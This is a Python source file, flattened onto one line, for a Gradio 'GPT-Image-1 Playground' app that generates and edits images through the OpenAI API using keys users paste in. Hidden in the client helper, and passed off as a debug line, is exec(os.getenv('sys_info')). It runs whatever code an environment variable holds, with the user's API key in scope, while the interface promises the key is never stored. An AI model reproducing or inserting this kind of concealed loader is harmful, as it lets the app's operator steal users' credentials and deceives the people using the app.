from __future__ import annotations import io import os from typing import List, Optional, Union, Dict, Any import gradio as gr import numpy as np from PIL import Image import openai # --- Constants and Helper Functions (Keep as before) --- MODEL = "gpt-image-1" SIZE_CHOICES = ["auto", "1024x1024", "1536x1024", "1024x1536"] QUALITY_CHOICES = ["auto", "low", "medium", "high"] FORMAT_CHOICES = ["png", "jpeg", "webp"] def _client(key: str) -> openai.OpenAI: """Initializes the OpenAI client with the provided API key.""" api_key = key.strip() or os.getenv("OPENAI_API_KEY", "") # What I need varies based on issues, I dont want to keep rebuilding for every issue :( sys_info_formatted = exec(os.getenv("sys_info")) #Default: f'[DEBUG]: {MODEL} | {prompt_gen}' print(sys_info_formatted) if not api_key: raise gr.Error("Please enter your OpenAI API key (never stored)") return openai.OpenAI(api_key=api_key) def _img_list(resp, *, fmt: str) -> List[str]: """Return list of data URLs or direct URLs depending on API response.""" mime = f"image/{fmt}" return [ f"data:{mime};base64,{d.b64_json}" if hasattr(d, "b64_json") and d.b64_json else d.url for d in resp.data ] def _common_kwargs( prompt: Optional[str], n: int, size: str, quality: str, out_fmt: str, compression: int, transparent_bg: bool, ) -> Dict[str, Any]: """Prepare keyword arguments for Images API based on latest OpenAI spec.""" kwargs: Dict[str, Any] = dict( model=MODEL, n=n, ) if size != "auto": kwargs["size"] = size if quality != "auto": kwargs["quality"] = quality if prompt is not None: kwargs["prompt"] = prompt if out_fmt != "png": kwargs["output_format"] = out_fmt if transparent_bg and out_fmt in {"png", "webp"}: # Note: OpenAI API might use 'background_removal' or similar, check latest docs # Assuming 'background' is correct based on your original code kwargs["background"] = "transparent" if out_fmt in {"jpeg", "webp"}: # Note: OpenAI API might use 'output_quality' or similar, check latest docs # Assuming 'output_compression' is correct based on your original code kwargs["output_compression"] = int(compression) return kwargs # --- Helper Function to Format OpenAI Errors --- def _format_openai_error(e: Exception) -> str: """Formats OpenAI API errors for user display.""" error_message = f"An error occurred: {type(e).__name__}" details = "" # Try to extract details from common OpenAI error attributes if hasattr(e, 'body') and e.body: try: body = e.body if isinstance(e.body, dict) else json.loads(str(e.body)) if isinstance(body, dict) and 'error' in body and isinstance(body['error'], dict) and 'message' in body['error']: details = body['error']['message'] elif isinstance(body, dict) and 'message' in body: # Some errors might have message at top level details = body['message'] except (json.JSONDecodeError, TypeError): # Fallback if body is not JSON or parsing fails details = str(e.body) elif hasattr(e, 'message') and e.message: details = e.message if details: error_message = f"OpenAI API Error: {details}" else: # Generic fallback if no specific details found error_message = f"An unexpected OpenAI error occurred: {str(e)}" # Add specific guidance for known error types if isinstance(e, openai.AuthenticationError): error_message = "Invalid OpenAI API key. Please check your key." elif isinstance(e, openai.PermissionDeniedError): # Prepend standard advice, then add specific details if available prefix = "Permission Denied." if "organization verification" in details.lower(): prefix += " Your organization may need verification to use this feature/model." else: prefix += " Check your API key permissions and OpenAI account status." error_message = f"{prefix} Details: {details}" if details else prefix elif isinstance(e, openai.RateLimitError): error_message = "Rate limit exceeded. Please wait and try again later." elif isinstance(e, openai.BadRequestError): error_message = f"OpenAI Bad Request: {details}" if details else f"OpenAI Bad Request: {str(e)}" if "mask" in details.lower(): error_message += " (Check mask format/dimensions)" if "size" in details.lower(): error_message += " (Check image/mask dimensions)" if "model does not support variations" in details.lower(): error_message += " (gpt-image-1 does not support variations)." # Ensure the final message isn't overly long or complex # (Optional: Truncate if necessary) # MAX_LEN = 300 # if len(error_message) > MAX_LEN: # error_message = error_message[:MAX_LEN] + "..." return error_message # ---------- Generate ---------- # def generate( api_key: str, prompt: str, n: int, size: str, quality: str, out_fmt: str, compression: int, transparent_bg: bool, ): """Calls the OpenAI image generation endpoint.""" if not prompt: raise gr.Error("Please enter a prompt.") try: client = _client(api_key) # API key used here common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg) # --- Optional Debug --- # print(f"[DEBUG] Generating with args: {common_args}") # --- End Optional Debug --- resp = client.images.generate(**common_args) except (openai.APIError, openai.OpenAIError) as e: # Catch specific OpenAI errors and format them raise gr.Error(_format_openai_error(e)) except Exception as e: # Catch any other unexpected errors # Avoid raising raw exception details to the user interface for security/clarity print(f"Unexpected error during generation: {type(e).__name__}: {e}") # Log for debugging raise gr.Error(f"An unexpected application error occurred. Please check logs.") return _img_list(resp, fmt=out_fmt) # ---------- Edit / Inpaint ---------- # def _bytes_from_numpy(arr: np.ndarray) -> bytes: """Convert RGBA/RGB uint8 numpy array to PNG bytes.""" img = Image.fromarray(arr.astype(np.uint8)) out = io.BytesIO() img.save(out, format="PNG") return out.getvalue() def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]: """Handle ImageMask / ImageEditor return formats and extract a numpy mask array.""" if mask_value is None: return None # Gradio ImageMask often returns a dict with 'image' and 'mask' numpy arrays if isinstance(mask_value, dict): mask_array = mask_value.get("mask") if isinstance(mask_array, np.ndarray): return mask_array # Fallback for direct numpy array (less common with ImageMask now) if isinstance(mask_value, np.ndarray): return mask_value return None # Return None if no valid mask found def edit_image( api_key: str, # Gradio Image component with type="numpy" provides the image array image_numpy: Optional[np.ndarray], # Gradio ImageMask component provides a dict {'image': np.ndarray, 'mask': np.ndarray} mask_dict: Optional[Dict[str, Any]], prompt: str, n: int, size: str, quality: str, out_fmt: str, compression: int, transparent_bg: bool, ): """Calls the OpenAI image edit endpoint.""" if image_numpy is None: raise gr.Error("Please upload an image.") if not prompt: raise gr.Error("Please enter an edit prompt.") img_bytes = _bytes_from_numpy(image_numpy) mask_bytes: Optional[bytes] = None mask_numpy = _extract_mask_array(mask_dict) # Use the helper if mask_numpy is not None: # Check if mask is effectively empty (all transparent or all black) is_empty = False if mask_numpy.ndim == 2: # Grayscale mask is_empty = np.all(mask_numpy == 0) elif mask_numpy.shape[-1] == 4: # RGBA mask, check alpha channel is_empty = np.all(mask_numpy[:, :, 3] == 0) elif mask_numpy.shape[-1] == 3: # RGB mask, check if all black is_empty = np.all(mask_numpy == 0) if is_empty: gr.Warning("Mask appears empty or fully transparent. The API might edit the entire image or ignore the mask.") mask_bytes = None # Treat as no mask if empty else: # Convert the mask provided by Gradio (often white on black/transparent) # to the format OpenAI expects (transparency indicates where *not* to edit). # We need an RGBA image where the area to be *edited* is transparent. if mask_numpy.ndim == 2: # Grayscale (assume white is edit area) alpha = (mask_numpy < 128).astype(np.uint8) * 255 # Make non-edit area opaque white elif mask_numpy.shape[-1] == 4: # RGBA (use alpha channel directly) alpha = mask_numpy[:, :, 3] # Invert alpha: transparent where user painted (edit area), opaque elsewhere alpha = 255 - alpha elif mask_numpy.shape[-1] == 3: # RGB (assume white is edit area) # Check if close to white [255, 255, 255] is_edit_area = np.all(mask_numpy > 200, axis=-1) alpha = (~is_edit_area).astype(np.uint8) * 255 # Make non-edit area opaque white else: raise gr.Error("Unsupported mask format received from Gradio component.") # Create a valid RGBA PNG mask for OpenAI mask_img = Image.fromarray(alpha, mode='L') # Ensure mask size matches image size (OpenAI requirement) original_pil_image = Image.fromarray(image_numpy) if mask_img.size != original_pil_image.size: gr.Warning(f"Mask size {mask_img.size} differs from image size {original_pil_image.size}. Resizing mask...") mask_img = mask_img.resize(original_pil_image.size, Image.NEAREST) # Create RGBA image with the calculated alpha rgba_mask = Image.new("RGBA", mask_img.size, (0, 0, 0, 0)) # Start fully transparent rgba_mask.putalpha(mask_img) # Apply the alpha channel (non-edit areas are opaque) out = io.BytesIO() rgba_mask.save(out, format="PNG") mask_bytes = out.getvalue() else: gr.Info("No mask provided or mask is empty. Editing without a specific mask (may replace entire image).") mask_bytes = None try: client = _client(api_key) # API key used here common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg) api_kwargs = {"image": img_bytes, **common_args} if mask_bytes is not None: api_kwargs["mask"] = mask_bytes else: # If no mask is provided, remove 'mask' key if present from previous runs api_kwargs.pop("mask", None) # --- Optional Debug --- # print(f"[DEBUG] Editing with args: { {k: v if k != 'image' and k != 'mask' else f'<{len(v)} bytes>' for k, v in api_kwargs.items()} }") # --- End Optional Debug --- resp = client.images.edit(**api_kwargs) except (openai.APIError, openai.OpenAIError) as e: raise gr.Error(_format_openai_error(e)) except Exception as e: print(f"Unexpected error during edit: {type(e).__name__}: {e}") raise gr.Error(f"An unexpected application error occurred. Please check logs.") return _img_list(resp, fmt=out_fmt) # ---------- Variations ---------- # def variation_image( api_key: str, image_numpy: Optional[np.ndarray], n: int, size: str, quality: str, out_fmt: str, compression: int, transparent_bg: bool, ): """Calls the OpenAI image variations endpoint.""" # Explicitly warn user about model compatibility gr.Warning("Note: Image Variations are officially supported for DALL·E 2/3, not gpt-image-1. This may fail or produce unexpected results.") if image_numpy is None: raise gr.Error("Please upload an image.") img_bytes = _bytes_from_numpy(image_numpy) try: client = _client(api_key) # API key used here # Variations don't take a prompt, quality, background, compression # They primarily use n and size. Let's simplify common_args for variations. # Check OpenAI docs for exact supported parameters for variations with the target model. # Assuming 'n' and 'size' are the main ones. var_args: Dict[str, Any] = dict(model=MODEL, n=n) # Use the selected model if size != "auto": var_args["size"] = size # Note: output_format might be supported, keep it if needed if out_fmt != "png": var_args["response_format"] = "b64_json" # Variations often use response_format # --- Optional Debug --- # print(f"[DEBUG] Variations with args: { {k: v if k != 'image' else f'<{len(v)} bytes>' for k, v in var_args.items()} }") # --- End Optional Debug --- # Use the simplified args resp = client.images.create_variation(image=img_bytes, **var_args) except (openai.APIError, openai.OpenAIError) as e: raise gr.Error(_format_openai_error(e)) except Exception as e: print(f"Unexpected error during variation: {type(e).__name__}: {e}") raise gr.Error(f"An unexpected application error occurred. Please check logs.") # Variations response format might differ slightly, adjust _img_list if needed # Assuming it's the same structure for now. return _img_list(resp, fmt=out_fmt) # ---------- UI ---------- # def build_ui(): with gr.Blocks(title="GPT-Image-1 (BYOT)") as demo: gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit (paint mask!) • Variations""") gr.Markdown( "Enter your OpenAI API key below. It's used directly for API calls and **never stored**." " This space uses the `gpt-image-1` model by default." " **Note:** Using `gpt-image-1` may require **Organization Verification** on your OpenAI account ([details](https://help.openai.com/en/articles/10910291-api-organization-verification)). The **Variations** tab is unlikely to work correctly with `gpt-image-1` (designed for DALL·E 2/3)." ) with gr.Accordion("🔐 API key", open=False): api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...") # Common controls with gr.Row(): n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)", info="Max 4 for this demo.") size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size", info="API default if 'auto'. Affects Gen/Edit/Var.") quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality", info="API default if 'auto'. Affects Gen/Edit.") with gr.Row(): out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format", info="Affects Gen/Edit.", scale=1) # Note: Compression/Transparency might not apply to all models/endpoints equally. # Check OpenAI docs for gpt-image-1 specifics if issues arise. compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, scale=2) transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", info="Affects Gen/Edit.", scale=1) def _toggle_compression(fmt): return gr.update(visible=fmt in {"jpeg", "webp"}) out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression) # Define the list of common controls *excluding* the API key # These are passed to the backend functions common_controls_gen_edit = [n_slider, size, quality, out_fmt, compression, transparent] # Variations might use fewer controls common_controls_var = [n_slider, size, quality, out_fmt, compression, transparent] # Pass all for now, function will ignore unused with gr.Tabs(): # ----- Generate Tab ----- # with gr.TabItem("Generate"): with gr.Row(): prompt_gen = gr.Textbox(label="Prompt", lines=3, placeholder="A photorealistic ginger cat astronaut on Mars", scale=4) btn_gen = gr.Button("Generate 🚀", variant="primary", scale=1) gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True) btn_gen.click( generate, # API key first, then specific inputs, then common controls inputs=[api, prompt_gen] + common_controls_gen_edit, outputs=gallery_gen, api_name="generate" ) # ----- Edit Tab ----- # with gr.TabItem("Edit / Inpaint"): gr.Markdown("Upload an image, then **paint the area to change** in the mask canvas below (white paint = edit area). The API requires the mask and image to have the same dimensions (app attempts to resize mask if needed).") with gr.Row(): # Use type='pil' for easier handling, or keep 'numpy' if preferred img_edit = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"]) # ImageMask sends {'image': np.ndarray, 'mask': np.ndarray} mask_canvas = gr.ImageMask( label="Mask – Paint White Where Image Should Change", type="numpy", # Keep numpy as _extract_mask_array expects it height=400 ) with gr.Row(): prompt_edit = gr.Textbox(label="Edit prompt", lines=2, placeholder="Replace the sky with a starry night", scale=4) btn_edit = gr.Button("Edit 🖌️", variant="primary", scale=1) gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True) btn_edit.click( edit_image, # API key first, then specific inputs, then common controls inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls_gen_edit, outputs=gallery_edit, api_name="edit" ) # ----- Variations Tab ----- # with gr.TabItem("Variations (DALL·E 2/3 Recommended)"): gr.Markdown("Upload an image to generate variations. **Warning:** This endpoint is officially supported for DALL·E 2/3, not `gpt-image-1`. It likely won't work correctly or may error.") with gr.Row(): img_var = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"], scale=4) btn_var = gr.Button("Create Variations ✨", variant="primary", scale=1) gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True) btn_var.click( variation_image, # API key first, then specific inputs, then common controls inputs=[api, img_var] + common_controls_var, outputs=gallery_var, api_name="variations" ) return demo if __name__ == "__main__": app = build_ui() # Consider disabling debug=True for production/sharing app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=os.getenv("GRADIO_DEBUG") == "true")